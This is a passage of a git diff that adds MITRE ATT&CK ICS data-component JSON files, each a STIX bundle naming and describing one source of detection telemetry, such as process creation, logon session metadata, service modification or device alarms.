protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json new file mode 100644 index 0000000000000000000000000000000000000000..77005b8efb341db69f9b1e53437fcec690c44ccd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--78e62ec6-1854-47e3-aa4d-23001b840577", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json new file mode 100644 index 0000000000000000000000000000000000000000..fdb3c980049b3f61f56415ca9502441b43968a11 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--0015a87f-b2ff-421b-8735-42d4b5aca1a1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json new file mode 100644 index 0000000000000000000000000000000000000000..fcc48ef1c775f3039ee48fe4056da2305f681b4b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--76f75b51-932f-4822-8ae4-eec1b8804244", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Creation", + "description": "Initial construction of a drive letter or mount point to a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e.json new file mode 100644 index 0000000000000000000000000000000000000000..4e850a063e82270fcc39de871482b7e75da678a7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--ec150350-edbf-45fd-bf05-d620c23bb4cb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "name": "Process/Event Alarm", + "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json new file mode 100644 index 0000000000000000000000000000000000000000..67fa711c068287c22556863a9402c31a9c0fda74 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3e858804-fcca-41bd-801b-46615d5c67c4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Modification", + "description": "Changes made to a drive letter or mount point of a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json new file mode 100644 index 0000000000000000000000000000000000000000..0a6a62535599072505b5d1b7207f0da0b4d9949a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3bb7b46b-4258-4f61-91b0-b9ee6557cffc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Creation", + "description": "Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json new file mode 100644 index 0000000000000000000000000000000000000000..d4ca0961a7636e36e880a298c2e759dd1b4f74ee --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--01c6673f-cb14-4689-aacb-b79116800ad5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json new file mode 100644 index 0000000000000000000000000000000000000000..2f9f49d3dfaca39b80a11237e4fe3e0c8f67a8d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--bae4699c-7ced-46c4-be22-e59be638ce2a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Metadata", + "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json new file mode 100644 index 0000000000000000000000000000000000000000..bd8d350217021b58a31368a85b292b5126a1c72a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--681899f0-b690-45c7-ad90-3e70bfdd6dcc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Modification", + "description": "Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json new file mode 100644 index 0000000000000000000000000000000000000000..44213be1dab6bda131256e42e193afefd94c0950 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--30e87ac0-8447-4419-977c-d914b763fe68", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json new file mode 100644 index 0000000000000000000000000000000000000000..2b60fa66a066859f9deca0a8c64db6a4904d019c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e6b6cf70-631d-47a6-8d54-6ce2b67dbabd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json new file mode 100644 index 0000000000000000000000000000000000000000..eb50b60724a76b15b875d3842c08d6949ffd1996 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--16792041-3e10-4c59-aa61-6057d3af815e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json new file mode 100644 index 0000000000000000000000000000000000000000..6e0fa14303ba0edbdb46ea09eff70750b46fa3a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9475f9ad-d073-4400-baab-34750a91370a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Modification", + "description": "Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d.json new file mode 100644 index 0000000000000000000000000000000000000000..4ac5d14c46e4d5287f1862de69dbda4514ee29f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--c7e7e616-1015-4c2e-89dd-26691ac3c34d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T21:47:33.604Z", + "name": "Software", + "description": "This includes sources of current and expected software or application programs deployed to a device, along with information on the version and patch level for vendor products, full source code for any application programs, and unique identifiers (e.g., hashes, signatures).", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "created": "2022-09-23T16:36:08.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95.json new file mode 100644 index 0000000000000000000000000000000000000000..d121897c8abd5d5f0897da59dc5fcc9b999af388 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--312837cb-6220-4c38-b85c-f9653737e95b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "name": "Process History/Live Data", + "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json new file mode 100644 index 0000000000000000000000000000000000000000..d82580c285de9b3e35cbdebd8b498f6b2ad2c20b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--b87fec8e-8659-4232-a024-ad6644d19029", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T15:41:36.287Z", + "name": "OS API Execution", + "description": "Operating system function/method calls executed by a process", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json new file mode 100644 index 0000000000000000000000000000000000000000..956c6ccc51e0100761041d50d0d38bfb8f0d7a9e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--461e74ee-e640-4d36-866d-6da18fcc9dac", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Application Log Content", + "description": "Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json new file mode 100644 index 0000000000000000000000000000000000000000..a42284b8d1c306bbe37d4ea7bb27464aa8d79645 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--8dbc0c7e-036d-49b0-94f5-86bede3dfbf1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:18:20.802Z", + "name": "Logon Session Creation", + "description": "Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298.json new file mode 100644 index 0000000000000000000000000000000000000000..c82546cc3104e36ebdb3e28f5581ef3c955143e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--b53a0a0c-26fb-4713-98cd-f14e5f94d834", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "name": "Device Alarm", + "description": "This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": 